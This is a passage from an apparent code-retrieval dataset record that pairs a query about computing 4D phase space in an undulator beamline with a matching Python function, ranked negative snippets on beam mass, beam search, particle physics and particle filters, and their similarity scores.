nsm_centroid = (p1 + p2) / 2.\n\n # mass_per_length already includes nsm\n mass_per_length = integrate_positive_unit_line(prop.xxb, mass_per_lengths)\n nsm_per_length = 0.\n\n #nsm_centroid = np.zeros(3) # TODO: what is this...\n #nsm = prop.nsm[0] * length # TODO: simplified\n elif prop.type == 'PBCOMP':\n mass_per_length = prop.MassPerLength()\n nsm_per_length = prop.nsm\n nsm_n1 = (p1 + jhat * prop.m1 + khat * prop.m2)\n nsm_n2 = (p2 + jhat * prop.m1 + khat * prop.m2)\n nsm_centroid = (nsm_n1 + nsm_n2) / 2.\n elif prop.type == 'PBMSECT':\n return mass\n #mass_per_length = prop.MassPerLength()\n #m = mass_per_length * length\n #nsm = prop.nsm\n else: # pragma: no cover\n raise NotImplementedError(prop.type)\n\n m = mass_per_length * length\n nsm = nsm_per_length * length\n if CHECK_MASS and ((m + nsm) != elem.Mass() or not np.array_equal(centroid, elem.Centroid())): # pragma: no cover\n msg = 'CBEAM; eid=%s; %s pid=%s; m/L=%s nsm/L=%s; length=%s\\n' % (\n elem.eid, elem.pid, prop.type, mass_per_length, nsm_per_length, length)\n msg += 'mass_new=%s mass_old=%s\\n' % (m, elem.Mass())\n msg += 'centroid_new=%s centroid_old=%s\\n%s' % (\n str(centroid), str(elem.Centroid()), str(elem))\n raise RuntimeError(msg)\n\n #nsm = (nsm_per_length + nsmi) * length\n (x, y, z) = centroid - reference_point\n (xm, ym, zm) = nsm_centroid - reference_point\n x2 = x * x\n y2 = y * y\n z2 = z * z\n xm2 = xm * xm\n ym2 = ym * ym\n zm2 = zm * zm\n\n # Ixx, Iyy, Izz, Ixy, Ixz, Iyz\n inertia[0] += m * (y2 + z2) + nsm * (ym2 + zm2)\n inertia[1] += m * (x2 + z2) + nsm * (xm2 + zm2)\n inertia[2] += m * (x2 + y2) + nsm * (xm2 + ym2)\n inertia[3] += m * x * y + nsm * xm * ym\n inertia[4] += m * x * z + nsm * xm * zm\n inertia[5] += m * y * z + nsm * ym * zm\n massi = m + nsm\n mass += massi\n cg += m * centroid + nsm * nsm_centroid\n return mass", "def beam_search_MAP(logits, beam_size=20, lp=50.0):\n inf = 1e10\n distribution = tf.nn.softmax(logits)\n B, T, V = distribution.shape\n aligns = tf.zeros([B * beam_size, 0], tf.int32)\n scores = tf.constant([0.0] + [-inf]*(beam_size-1), dtype=tf.float32) # [beam_size]\n scores = tf.tile(scores, multiples=[B]) # [B x beam_size]\n base_indices = tf.reshape(tf.tile(tf.range(B)[:, None], multiples=[1, beam_size]), [-1])\n preds_prev = -1 * tf.ones([B * beam_size, beam_size], tf.int32)\n lengths = tf.zeros([B * beam_size], tf.int32)\n # marks_token = tf.zeros([B * beam_size, 0], tf.int32)\n prev = time()\n for t in range(T):\n p_prior = tf.ones([B*beam_size, V]) / V\n p_past = tf.ones([B*beam_size, V]) / V\n p_cur = tf.reshape(tf.tile(distribution[:, t, :], [1, beam_size]), [B*beam_size, V])\n p_log = tf.math.log(p_past) + tf.math.log(p_cur) - tf.math.log(p_prior)\n\n scores_cur, preds_cur = tf.nn.top_k(p_log, k=beam_size, sorted=True)\n\n # current scores\n scores = scores[:, None] + scores_cur # [B x beam_size, beam_size]\n scores = tf.reshape(scores, [B, beam_size ** 2])\n\n # current predicts\n marks_cur = tf.cast(tf.not_equal(preds_cur, preds_prev), tf.int32)\n\n # length penalty\n lengths = lengths[:, None] + marks_cur\n lp_score = tf.reshape(tf.pow((5+tf.cast(lengths, tf.float32))/6, lp), [B, beam_size ** 2])\n # lp_score = 1.0\n scores /= lp_score\n\n # pruning\n _, k_indices = tf.nn.top_k(scores, k=beam_size)\n k_indices = base_indices * beam_size * beam_size + tf.reshape(k_indices, [-1]) # [B x beam_size]\n\n # # update marks_token\n # marks_cur = tf.reshape(marks_cur, [-1])\n # marks_cur = tf.gather(marks_cur, k_indices)\n # marks_token = tf.gather(marks_token, k_indices // beam_size)\n # marks_token = tf.concat([marks_token, marks_cur[:, None]], 1)\n\n # update lengths\n lengths = tf.reshape(lengths, [-1])\n lengths = tf.gather(lengths, k_indices)\n\n # print('lengths:', (lengths - tf.reduce_sum((marks_token), -1)).numpy())\n\n # Update scores\n scores = tf.reshape(scores, [-1])\n scores = tf.gather(scores, k_indices)\n\n # update preds\n preds_prev = preds_cur\n preds_cur = tf.reshape(preds_cur, [-1])\n preds_cur = tf.gather(preds_cur, k_indices)\n # k_indices: [0~B x beam_size x beam_size], preds: [0~B x beam_size]\n aligns = tf.gather(aligns, k_indices // beam_size)\n aligns = tf.concat([aligns, preds_cur[:, None]], -1)\n\n print(time() - prev, 's')\n prev = time()\n\n aligns = aligns[::beam_size, :]\n # marks_token = marks_token[::beam_size, :]\n # lengths = lengths[::beam_size]\n # max_len = tf.reduce_max(lengths)\n # predicts = []\n # for b in range(B):\n # predict = tf.reshape(tf.gather(aligns[b, :], tf.where(marks_token[b, :]>0)), [-1])\n # pad = tf.zeros([max_len - lengths[b]], tf.int32)\n # predicts.append(tf.concat([predict, pad], 0))\n # tf.stack(predicts, 0)\n\n return aligns", "def Schechter_M(M, phi_s, M_s, alpha):\n\treturn 0.4 * n.log(10.) * phi_s * 10**(0.4 * (M_s - M) * (alpha + 1)) * n.e**(-10**(0.4 * (M_s - M)))", "def analyze(self, event):\n nloSF = 1.0\n boson_pt=0\n mjj=0\n #print ' - event %d:'%(event._entry)\n\n if self._worker: \n\n genParticles = Collection(event, \"GenPart\")\n boson_found = False\n lep1 = None\n lep2 = None\n for part in genParticles:\n #if ( (part.pdgId == 23 or abs(part.pdgId) == 24) and (part.statusFlags & 0x2000)>0 and (part.statusFlags & 0x100)>0 ):\n if ( (abs(part.pdgId)>10 and abs(part.pdgId) < 17) and ( (part.status == 1 and (part.statusFlags & 0x1)>0) or ((part.statusFlags & 0x1)>0 and (part.statusFlags & 0x2)>0) ) ):\n if (part.genPartIdxMother>=0):\n mother = genParticles[part.genPartIdxMother]\n #print ' --- event %d pdgid %d --- pdg mother %d: %d '%(event._entry,part.pdgId,part.genPartIdxMother,mother.pdgId)\n \n if (mother.pdgId == 23 or abs(mother.pdgId) == 24):\n boson_pt = mother.pt\n boson_found = True\n break\n else:\n if (part.pdgId>0):\n lep1 = part\n else:\n lep2 = part\n\n else:\n #print ' --- event %d pdgid %d --- no mother'%(event._entry,part.pdgId)\n if (part.pdgId>0):\n lep1 = part\n else:\n lep2 = part\n\n if (not boson_found and lep1 is not None and lep2 is not None):\n boson_pt = (lep1.p4()+lep2.p4()).Pt()\n boson_found = True\n\n if (not boson_found):\n idx=0\n print ' --- event %d boson not found:'%(event._entry)\n for part in genParticles:\n print ' ------ part %d: pdgid %d pT %3.3f status %d flags %d mother %d'%(idx,part.pdgId,part.pt,part.status,part.statusFlags,part.genPartIdxMother)\n idx += 1\n\n #if (part.genPartIdxMother>=0):\n #print ' ------ pdg mother %d: %d '%(part.genPartIdxMother,genParticles[part.genPartIdxMother].pdgId)\n\n\n\n genJets = Collection(event, \"GenJet\")\n #idx = 0\n #for genjet in genJets:\n # print 'Jet %d: pT=%3.3f GeV'%(idx,genjet.pt)\n # idx += 1\n if (len(genJets)>1):\n mjj = (genJets[0].p4()+genJets[1].p4()).M()\n \n nloSF = self._worker.getSF(boson_pt,mjj)\n if boson_found: self.counter += 1\n\n self.out.fillBranch(\"nloSF_%s\"%(self.process),nloSF)\n self.out.fillBranch(\"gen_boson_pt\",boson_pt)\n self.out.fillBranch(\"gen_mjj\",mjj)\n return True", "def _update_ps(self, es):\n if not self.is_initialized:\n self.initialize(es)\n if self._ps_updated_iteration == es.countiter:\n return\n z = es.isotropic_mean_shift\n if es.opts['CSA_clip_length_value'] is not None:\n vals = es.opts['CSA_clip_length_value']\n try: len(vals)\n except TypeError: vals = [-np.inf, vals]\n if vals[0] > 0 or vals[1] < 0:\n raise ValueError(\n \"\"\"value(s) for option 'CSA_clip_length_value' = %s\n not allowed\"\"\" % str(es.opts['CSA_clip_length_value']))\n min_len = es.N**0.5 + vals[0] * es.N / (es.N + 2)\n max_len = es.N**0.5 + vals[1] * es.N / (es.N + 2)\n act_len = _norm(z)\n new_len = Mh.minmax(act_len, min_len, max_len)\n if new_len != act_len:\n z *= new_len / act_len\n # z *= (es.N / sum(z**2))**0.5 # ==> sum(z**2) == es.N\n # z *= es.const.chiN / sum(z**2)**0.5\n self.ps = (1 - self.cs) * self.ps + _sqrt(self.cs * (2 - self.cs)) * z\n self._ps_updated_iteration = es.countiter", "def _analyze(self):\n self.sim_setup_name, self.sweep_name = self.renderer.initialize_drivenmodal(\n **self.setup)\n\n self.renderer.analyze_sweep(self.sweep_name, self.sim_setup_name)\n # TODO: return the impedance, admittance and scattering matrices for later use", "def fs2ps2D(px, s):\n\t\tsfun = psarclength(px)\t\n\t\treturn sfun-s", "def analyse(self):\n self.__try_fitting()\n self.second.rotate()\n self.__try_fitting()", "def enrich_params(self):\n\n self.params['nmaps'] = len(self.params['probes']) + np.sum(self.params['spins'] == 2)\n\n pass", "def compute_embeddings(self, prop_state, A):\n ## PROP state is initialized to Annotation somewhere before\n for i_step in range(self.n_steps):\n # print (\"PROP STATE SIZE:\", prop_state.size()) #batch size x |V| x state dim\n in_states = []\n out_states = []\n\n # in_fcs[i] -> in_fcs.__getitem__(i) -> self.in_{i}, which is a linear layer state_dim -> state_dim\n for i in range(self.n_edge_types):\n in_states.append(self.in_fcs[i](prop_state))\n out_states.append(self.out_fcs[i](prop_state))\n in_states = tt.stack(in_states).transpose(0, 1).contiguous() # Batch, edge, node, embed\n in_states = in_states.view(-1, self.n_nodes*self.n_edge_types, self.state_dim)\n out_states = tt.stack(out_states).transpose(0, 1).contiguous()\n out_states = out_states.view(-1, self.n_nodes*self.n_edge_types, self.state_dim) # batch size x |V||E| x state dim\n\n prop_state = self.propagator(in_states, out_states, prop_state, A)\n\n return prop_state", "def sensor_model(particle_poses, beacon_pose, beacon_loc):\n \n \n\n M = particle_poses.shape[0]\n particle_weights = np.zeros(M)\n \n # TODO. For each particle calculate its weight based on its pose,\n # the relative beacon pose, and the beacon location.\n\n\n if sensor_model_on:\n #becon conditioning\n #camera_to_robot = (0.1, 0.1, 0)\n becon_pose_robot = transform_pose(camera_to_robot, beacon_pose )\n\n #print(beacon_pose)\n #print(becon_pose_robot)\n \n #liekelyhood functions\n becon_range = np.sqrt((becon_pose_robot[0])**2 + (becon_pose_robot[1])**2)\n becon_angle = becon_pose_robot[2]\n\n #print(becon_range)\n #print(becon_angle * 180 / np.pi)\n \n \n for m in range(M):\n\n if sensor_model_on:\n \n x_b = beacon_loc[0]\n y_b = beacon_loc[1]\n x_p = particle_poses[m][0] #particle position in map frame\n y_p = particle_poses[m][1]\n theta_p = particle_poses[m][2]\n \n \n range_p2b = np.sqrt((x_b - x_p)**2 + (y_b - y_p)**2) #range from particle to becon\n b_angle_map = arctan2((y_b - y_p), (x_b-x_p))\n\n \n angle_p2b = angle_difference(theta_p, b_angle_map)\n\n rangeerror = gauss(becon_range - range_p2b, 0, sigma_r)\n angleerror = gauss(becon_angle - angle_p2b, 0, sigma_theta)\n \n particle_weights[m] = rangeerror * angleerror\n\n #print(rangeerror, angleerror)\n\n else:\n particle_weights[m] = 1\n\n return particle_weights" ]
[ "0.55478334", "0.55464554", "0.5515675", "0.54473466", "0.5417652", "0.5381833", "0.533846", "0.5251011", "0.5237646", "0.5210435", "0.5204704", "0.51945657", "0.5185809", "0.5178469", "0.5154056", "0.5144773", "0.51260614", "0.51221514", "0.51218563", "0.5119552", "0.51158684", "0.50984854", "0.5088232", "0.5085409", "0.50832456", "0.5081795", "0.5078837", "0.5055984", "0.5054278", "0.5021221", "0.50061464", "0.50017756", "0.49990347", "0.49976492", "0.4994555", "0.49881738", "0.49845457", "0.4982704", "0.49672833", "0.4966584", "0.49628675", "0.49092424", "0.49044994", "0.48884994", "0.48786613", "0.48776644", "0.48713046", "0.48668018", "0.48629025", "0.48566428", "0.48555478", "0.48529416", "0.48492557", "0.4846475", "0.48424006", "0.48394534", "0.48394448", "0.48368528", "0.48352027", "0.48345417", "0.48336497", "0.48317903", "0.48243943", "0.48242962", "0.48234555", "0.48200732", "0.48167074", "0.48103496", "0.48097575", "0.48088795", "0.48014048", "0.48008606", "0.4800791", "0.47976035", "0.4787659", "0.4787357", "0.4786", "0.47846553", "0.4781463", "0.4779777", "0.47793058", "0.4779063", "0.47738695", "0.47695833", "0.47682822", "0.47650847", "0.47634882", "0.4758798", "0.4752254", "0.47515708", "0.47492227", "0.47489268", "0.4746346", "0.47441941", "0.47408593", "0.47406086", "0.4732437", "0.47273412", "0.47259226", "0.47236213" ]
0.63167745
0
I want to use this function to calculate the 4D phase space at the end of some components in the undulator beamline.
def analyze_phase_space_at_end(ps_beg, beamline, beamline_id, id_slices, N_bin): phase_spc = ps_beg ## Count how many times the class beamline_id occurs in the beamline_id count_beamline = 0 for element in beamline: if isinstance(element, beamline_id): count_beamline += 1 ps_end = np.zeros((4, count_beamline, N_bin)) count_id = 0 for element in beamline: phase_spc = np.dot( element.M1, phase_spc ) +element.M2 if isinstance(element, beamline_id): ps_along_s = beam_property_along_s(phase_spc, id_slices) ps_end[0, count_id, :] = ps_along_s[0, :] ps_end[1, count_id, :] = ps_along_s[1, :] ps_end[2, count_id, :] = ps_along_s[2, :] ps_end[3, count_id, :] = ps_along_s[3, :] count_id += 1 return ps_end
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_phasedbeam(self):\n\n self.phasedbeam = n.zeros((len(self.dmarr),len(self.reltime)), dtype='float64')\n\n for i in xrange(len(self.dmarr)):\n self.phasedbeam[i] = self.dedisperse(dmbin=i).mean(axis=3).mean(axis=2).mean(axis=1).real # dedisperse and mean\n print 'dedispersed for ', self.dmarr[i]", "def make_phasedbeam(self):\n\n self.phasedbeam = n.zeros((len(self.dmarr),len(self.reltime)), dtype='float64')\n\n for i in xrange(len(self.dmarr)):\n for j in xrange(len(self.reltime)): \n# for j in xrange(0, len(self.reltime), max(1,self.twidths[i]/2)): # can also step by twidth/2, but leaves gaps in data products\n dmtrack = self.dmtrack(dm=self.dmarr[i], t0=self.reltime[j])\n if ((dmtrack[1][0] == 0) & (dmtrack[1][len(dmtrack[1])-1] == len(self.chans)-1)): # use only tracks that span whole band\n truearr = n.ones( (len(dmtrack[0]), self.nbl, self.npol))\n falsearr = n.zeros( (len(dmtrack[0]), self.nbl, self.npol))\n selection = self.data[dmtrack[0], :, dmtrack[1], :]\n weightarr = n.where(selection != 0j, truearr, falsearr) # ignore zeros in mean across channels # bit of a hack\n try:\n self.phasedbeam[i,j] = n.average(selection, weights=weightarr).real\n except ZeroDivisionError:\n self.phasedbeam[i,j] = n.mean(selection).real # if all zeros, just make mean # bit of a hack\n print 'dedispersed for ', self.dmarr[i]", "def make_phasedbeam(self):\n raise NotImplementedError('For now, you could instead used dispersion code with dmarr=[0.]...')", "def getPhase(phase):", "def get_phase_space(self, grid_flag):\n\n f = h5py.File(self.xs_path, 'r')\n self.N = f['paramdescrip']['NVALUE'].value # det maximum range Ni for each d_i\n phase_space = {}\n order = {}\n NPAR = f['paramdescrip']['NPAR'].value[0]\n for di in range(NPAR - 1):\n di_name = f['paramdescrip']['PARNAM'].value[di] # get names for dimensions. Starts at 0\n # get values for dimensions. Starts at 1. e.g. 'BURNUP': array([ 0., 9.35253143, 18.70503998,..\n # Is saved as a np.array, of floats64 FORTRAN-contiguous\n phase_space[di_name] = np.array([float(val) for val in f['paramvaleurs'][\n 'pval %d' % (di + 1)].value], order='F')\n order[di] = di_name # e.g. '7': 'BURNUP'\n\n iso_aux = []\n # just concatenate those two\n for iso in f['contenu']['NOMISO'].value[:]:\n iso_aux.append(iso)\n for iso in f['contenu']['NOMMAC'].value[:]:\n iso_aux.append(iso)\n f.close()\n self.iso_A2 = iso_aux\n\n # USER IMPOSED: Non-independant variables set to [0].\n \"\"\"\n *Do not eliminate them, this will bring problems with the cartesin product later one\n *if instead of '[phase_space['PHASE'][0]]' (which is equal to 1) just '[1]' is written then np.where() does not recognize the value.\n\n This two problems rise from the decision of defining the 'space of interest' as a subset from the 'phase space' which in time is read directly from the H5F file. Later several comparisons are made between the two. The upside is the need for no explicit declaration of the phase-space thus minimizing chances of un-noticed error in domain assignation.\n \"\"\"\n if 'PHASE' in phase_space.keys():\n phase_space['PHASE'] = [phase_space['PHASE'][0]]\n if 'BURNUPstep' in phase_space.keys():\n phase_space['BURNUPstep'] = [phase_space['BURNUPstep'][0]]\n\n if grid_flag == 'SG': # major update required\n \"\"\"\n In contras to FG, the stored values in the concatenated SAPHYB file only considers different burnup steps, i.e a set of values [0, 500, 500, 100] are stored as [0, 500, 100]. Two posibilities remain, read the BURNUP value from the single XS files separatly or load a pickeled object with the phase space. The second option was implemented.\n \"\"\"\n with open(self.file_path + self.xs_folder + 'phase_space.pickle', 'rb') as handle:\n phase_space_pk = pickle.load(handle)\n phase_space_pk.pop('a')\n phase_space_pk.pop('d')\n phase_space_pk.pop('l')\n phase_space_pk.pop('BURNUP_evol')\n phase_space_pk.pop('BURNUP_steps')\n phase_space = phase_space_pk\n\n self.phase_space, self.order, self.d, self.NPAR = phase_space, order, len(order), NPAR", "def detect_phasedbeam(self):\n raise NotImplementedError('For now, you could instead used dispersion code with dmarr=[0.]...')", "def GetPhase(self):\n ...", "def Magnus4(self,direction='x'):\n self.reset()\n self.mol.orthoDen()\n self.mol.orthoFock()\n h = -1j*self.stepsize\n for idx,time in enumerate((self.time)):\n if direction.lower() == 'x':\n self.mol.computeDipole()\n self.dipole.append(np.real(self.mol.mu[0]))\n elif direction.lower() == 'y':\n self.mol.computeDipole()\n self.dipole.append(np.real(self.mol.mu[1]))\n elif direction.lower() == 'z':\n self.mol.computeDipole()\n self.dipole.append(np.real(self.mol.mu[2]))\n # record pulse envelope for later plotting, etc.\n self.shape.append(self.pulse(time))\n curDen = np.copy(self.mol.PO)\n \n self.addField(time + 0.0*self.stepsize,direction=direction)\n k1 = h*self.mol.FO \n Q1 = k1\n U = expm(0.5*Q1)\n self.mol.PO = np.dot(U,np.dot(curDen,self.mol.adj(U))) \n self.mol.updateFock()\n \n self.addField(time + 0.5*self.stepsize,direction=direction)\n k2 = h*self.mol.FO\n Q2 = k2 - k1\n U = expm(0.5*Q1 + 0.25*Q2)\n self.mol.PO = np.dot(U,np.dot(curDen,self.mol.adj(U))) \n self.mol.updateFock()\n\n self.addField(time + 0.5*self.stepsize,direction=direction)\n k3 = h*self.mol.FO\n Q3 = k3 - k2\n U = expm(Q1 + Q2)\n self.mol.PO = np.dot(U,np.dot(curDen,self.mol.adj(U))) \n self.mol.updateFock()\n\n self.addField(time + 1.0*self.stepsize,direction=direction)\n k4 = h*self.mol.FO\n Q4 = k4 - 2*k2 + k1\n L = 0.5*Q1 + 0.25*Q2 + (1/3.)*Q3 - (1/24.)*Q4\n L += -(1/48.)*self.mol.comm(Q1,Q2)\n U = expm(L)\n self.mol.PO = np.dot(U,np.dot(curDen,self.mol.adj(U))) \n self.mol.updateFock()\n \n self.addField(time + 0.5*self.stepsize,direction=direction)\n k5 = h*self.mol.FO\n Q5 = k5 - k2 \n L = Q1 + Q2 + (2/3.)*Q3 + (1/6.)*Q4 - (1/6.)*self.mol.comm(Q1,Q2)\n U = expm(L)\n self.mol.PO = np.dot(U,np.dot(curDen,self.mol.adj(U))) \n self.mol.updateFock()\n \n self.addField(time + 1.0*self.stepsize,direction=direction)\n k6 = h*self.mol.FO\n Q6 = k6 -2*k2 + k1\n L = Q1 + Q2 + (2/3.)*Q5 + (1/6.)*Q6\n L += -(1/6.)*self.mol.comm(Q1, (Q2 - Q3 + Q5 + 0.5*Q6))\n\n U = expm(L)\n self.mol.PO = np.dot(U,np.dot(curDen,self.mol.adj(U))) \n self.mol.updateFock()\n \n # density and Fock are done updating, wrap things up\n self.mol.unOrthoFock() \n self.mol.unOrthoDen() \n self.mol.computeEnergy()\n self.Energy.append(np.real(self.mol.energy))", "def create_phase_separator():\n cost_operators = []\n reduced_distance_matrix = np.delete(distance_matrix, starting_node, axis=0)\n reduced_distance_matrix = np.delete(reduced_distance_matrix, starting_node, axis=1)\n reduced_number_of_nodes = len(reduced_distance_matrix)\n number_of_qubits = reduced_number_of_nodes ** 2\n\n for t in range(reduced_number_of_nodes - 1):\n for city_1 in range(reduced_number_of_nodes):\n for city_2 in range(reduced_number_of_nodes):\n if city_1 != city_2:\n distance = reduced_distance_matrix[city_1, city_2] \n qubit_1 = t * (reduced_number_of_nodes) + city_1\n qubit_2 = (t + 1) * (reduced_number_of_nodes) + city_2\n cost_operators.append(PauliTerm(\"Z\", qubit_1, distance) * PauliTerm(\"Z\", qubit_2))\n\n costs_to_starting_node = np.delete(distance_matrix[:, starting_node], starting_node)\n for city in range(reduced_number_of_nodes):\n distance_from_0 = -costs_to_starting_node[city]\n qubit = city\n cost_operators.append(PauliTerm(\"Z\", qubit, distance_from_0))\n\n for city in range(reduced_number_of_nodes):\n distance_from_0 = -costs_to_starting_node[city]\n qubit = number_of_qubits - (reduced_number_of_nodes) + city\n cost_operators.append(PauliTerm(\"Z\", qubit, distance_from_0))\n\n phase_separator = [PauliSum(cost_operators)]\n return phase_separator", "def phase(self):\n pass", "def get_entangling_phase (self, numpoints=512):\n\n t = np.linspace(self.t_dress_begin, self.t_undress_end, num=numpoints)\n\n Omega = np.empty(t.shape)\n dOmega_dt = np.empty(t.shape)\n Delta = np.empty(t.shape)\n dDelta_dt = np.empty(t.shape)\n\n kappa = np.empty(t.shape)\n\n for n in range(t.shape[0]):\n Omega[n], dOmega_dt[n] = self.get_Omega(t=t[n])\n Delta[n], dDelta_dt[n] = self.get_Delta(t=t[n])\n\n kappa[n] = self.get_kappa(t=t[n])\n\n phase_entangle = scipy.integrate.cumtrapz(kappa, t)[-1]\n\n return phase_entangle", "def _body_phase(acc_z, hz):\n phase = _phase_detect(acc_z)\n\n # Determing start and end of movement phase for right foot\n change = np.ediff1d(phase, to_begin=0)\n start_mov = np.where(change == 1)[0]\n end_mov = np.where(change == -1)[0]\n\n # if data ends with movement, assign final point as end of movement\n if len(start_mov) != len(end_mov):\n end_mov = np.append(end_mov, len(acc_z))\n del acc_z # delete acc_z, no use in further computations\n\n start_mov = list(start_mov)\n end_mov = list(end_mov)\n if phase[0] == 1:\n start_mov.insert(0, 0)\n # Assign first 10 data points of movement phase as balance (take_off)\n # TODO Change this to actually have take-off phase\n tf_win = int(0.30 * hz) # window for take_off\n for i in start_mov:\n phase[i:i + tf_win] = [0] * len(phase[i:i + tf_win])\n for j in end_mov:\n phase[j - tf_win:j] = [0] * len(phase[j - tf_win:j])\n return np.array(phase), start_mov, end_mov", "def ramp4p(params, phase, args=dict(n=5, guess=[1, -0.068, 2.33, 0.933, -20.5])):\n # 2013-12-07 14:08 IJMC: Created.\n\n return params[0] * (1. + np.exp(-params[1]*phase + params[2]) + \\\n params[3] * (phase - 0.5) + \\\n params[4] * (phase - 0.5)**2)", "def perform_phase_processing(LP_solver=\"pyglpk\"):\n radar = pyart.testing.make_single_ray_radar()\n phidp, kdp = pyart.correct.phase_proc_lp(radar, 0.0, LP_solver=LP_solver)\n return radar, phidp, kdp", "def app_phase(data_pupil,data_phase,oversize=4):\n return phaseangle(app_complex(data_pupil,data_phase,oversize))", "def analyze_on_axis(phase_space, id_begin, id_end, ds_slice, zplot):\n\n ps = phase_space[:, (id_begin-1):id_end, :]\n # print(np.shape(ps))\n # ps = ps[numpy.logical_not(numpy.isnan(ps))]\n\n x = ps[0, :, :]\n px = ps[1, :, :]\n y = ps[2, :, :]\n py = ps[3, :, :]\n\n id_on_axis = np.zeros((4, int(id_end-id_begin+1)))\n\n for n in range(int(id_end-id_begin+1)):\n x_this = x[n, :]\n px_this = px[n, :]\n y_this = y[n, :]\n py_this = py[n, :]\n\n # Remove all NAN elements in the phase space array\n x_this = x_this[np.logical_not(np.isnan(x_this))]\n px_this = px_this[np.logical_not(np.isnan(px_this))]\n y_this = y_this[np.logical_not(np.isnan(y_this))]\n py_this = py_this[np.logical_not(np.isnan(py_this))]\n\n ## Plot X\n plt.subplot(2, 2, 1)\n plt.plot(zplot[0:len(x_this)]*1e+6, x_this*1e+6)\n plt.ylabel('Position in X/ $\\mu$m', fontsize=10)\n\n ## Plot Y\n plt.subplot(2, 2, 2)\n plt.plot(zplot[0:len(y_this)]*1e+6, y_this*1e+6)\n plt.ylabel('Position in Y/ $\\mu$m', fontsize=10)\n\n ## Plot px\n plt.subplot(2, 2, 3)\n plt.plot(zplot[0:len(px_this)]*1e+6, px_this)\n plt.ylabel('Angle in X', fontsize=10)\n\n ## Plot py\n plt.subplot(2, 2, 4)\n plt.plot(zplot[0:len(py_this)]*1e+6, py_this)\n plt.ylabel('Angle in Y', fontsize=10)\n\n\n # plt.xlabel('Longitudianl Direction of the Bunch $s$/ $\\mu$m')\n # plt.title('First Undulator Section')\n # plt.title('Second Undulator Section')\n # plt.title('Third Undulator Section')\n\n id_on_axis[0, n] = np.argmin(np.abs(x_this))\n id_on_axis[1, n] = np.argmin(np.abs(px_this))\n id_on_axis[2, n] = np.argmin(np.abs(y_this))\n id_on_axis[3, n] = np.argmin(np.abs(py_this))\n\n fig = plt.gcf()\n fig.set_size_inches(13.5, 9)\n ax = plt.gca()\n ax.yaxis.get_major_formatter().set_powerlimits((0,1))\n fig.savefig('phase_space_U3_new.png', dpi=100)\n plt.show()\n\n\n s_on_axis = np.average(id_on_axis[2:4,:])*ds_slice\n\n return id_on_axis, s_on_axis", "def F_trans(self):\n rho_H1 = self.edp_par['rho_H1'].value\n Z_H1 = self.edp_par['Z_H1'].value\n sigma_H1 = self.edp_par['sigma_H1'].value\n rho_M = self.edp_par['rho_M'].value\n sigma_M = self.edp_par['sigma_M'].value\n psi = self.edp_par['psi'].value \n common_scale = self.edp_par['common_scale'].value\n \n # Calculate the intermediate variables\n alpha = self.qz*cos(psi) - self.qx*sin(psi)\n Z_CH2 = Z_H1 - sigma_H1\n Z_W = Z_H1 + sigma_H1\n DeltaZ_H = Z_W - Z_CH2\n \n # Calculate the Gaussian part \n FG = -rho_M*sigma_M * exp(-0.5*(alpha*sigma_M)**2)\n FG += 2*rho_H1*sigma_H1 * cos(alpha*Z_H1) * exp(-0.5*(alpha*sigma_H1)**2)\n FG *= np.sqrt(2*pi)\n \n # Calculate the strip part\n FS = -2 * sin(alpha*Z_CH2) / alpha\n \n # Calculate the bridging part\n FB = 1 / (alpha + pi/DeltaZ_H)\n FB += 1 / (alpha - pi/DeltaZ_H)\n FB *= sin(alpha*Z_W) + sin(alpha*Z_CH2)\n FB *= 0.5\n FB -= (sin(alpha*Z_W)-sin(alpha*Z_CH2)) / alpha\n \n return common_scale * (FG + FS + FB)", "def plot_phase_plane_closed_loop(self , x_axis = 0 , y_axis = 1 ):\n\n pp = phaseanalysis.PhasePlot( self , x_axis , y_axis )\n \n pp.compute_grid()\n pp.plot_init()\n \n # Closed-loop Behavior\n pp.color = 'r'\n pp.compute_vector_field()\n pp.plot_vector_field()\n \n # Open-Loop Behavior\n pp.f = self.plant.f\n pp.ubar = self.plant.ubar\n pp.color = 'b'\n pp.compute_vector_field()\n pp.plot_vector_field()\n \n pp.plot_finish()\n \n pp.phasefig.show()\n \n return pp", "def phase(self):\r\n\r\n #XXX calcluate this from the standard output, instead of recalculating:\r\n\r\n tseries_length = self.input.data.shape[0]\r\n spectrum_length = self.spectrum.shape[-1]\r\n\r\n phase = np.zeros((tseries_length,\r\n tseries_length,\r\n spectrum_length))\r\n\r\n for i in range(tseries_length):\r\n for j in range(i, tseries_length):\r\n phase[i][j] = np.angle(\r\n self.spectrum[i][j])\r\n\r\n phase[j][i] = np.angle(\r\n self.spectrum[i][j].conjugate())\r\n return phase", "def get_dihedral(p0,p1,p2,p3,unit):\n if unit == 'Ang':\n p0 = p0*0.529177249\n p1 = p1*0.529177249\n p2 = p2*0.529177249\n p3 = p3*0.529177249\n\n b0 = -1.0*(p1 - p0)\n b1 = p2 - p1\n b2 = p3 - p2\n\n # normalize b1 so that it does not influence magnitude of vector\n # rejections that come next\n b1 /= linalg.norm(b1)\n\n # vector rejections\n # v = projection of b0 onto plane perpendicular to b1\n # = b0 minus component that aligns with b1\n # w = projection of b2 onto plane perpendicular to b1\n # = b2 minus component that aligns with b1\n v = b0 - dot(b0, b1)*b1\n w = b2 - dot(b2, b1)*b1\n\n # angle between v and w in a plane is the torsion angle\n # v and w may not be normalized but that's fine since tan is y/x\n x = dot(v, w)\n y = dot(cross(b1, v), w)\n return degrees(arctan2(y, x))\n\n #q1 = subtract(p1,p0) # b - a \n #q2 = subtract(p2,p1) # c - b \n #q3 = subtract(p3,p2) # d - c\n #print(q1,q2)\n\n #q1_x_q2 = cross(q1,q2) \n #q2_x_q3 = cross(q2,q3)\n\n #n1 = q1_x_q2/sqrt(dot(q1_x_q2,q1_x_q2)) \n #n2 = q2_x_q3/sqrt(dot(q2_x_q3,q2_x_q3))\n\n #u1 = n2\n #u3 = q2/(sqrt(dot(q2,q2))) \n #u2 = cross(u3,u1)\n\n #cos_theta = dot(n1,u1)\n #sin_theta = dot(n1,u2)\n ## Calculate theta\n #theta = -atan2(sin_theta,cos_theta)\n ## it is different from atan2 from fortran math.atan2(y,x)\n #theta_deg = degrees(theta)\n #return(theta_deg)", "def lane_emden_step(x,y,dx,n,w):\n _solver.rk4(x,y[0],y[1],dx,n,w)\n out = _solver.rk4out\n return np.array([out.z0,out.z1])", "def get_trace_phase(self, linear_comp=False):\n eps = self.phase_thr\n\n if self.Et is not None:\n # Center peak in time\n ind = np.argmax(abs(self.Et))\n shift = (self.Et.shape[0] / 2 - ind).astype(int)\n Et = np.roll(self.Et, shift)\n\n 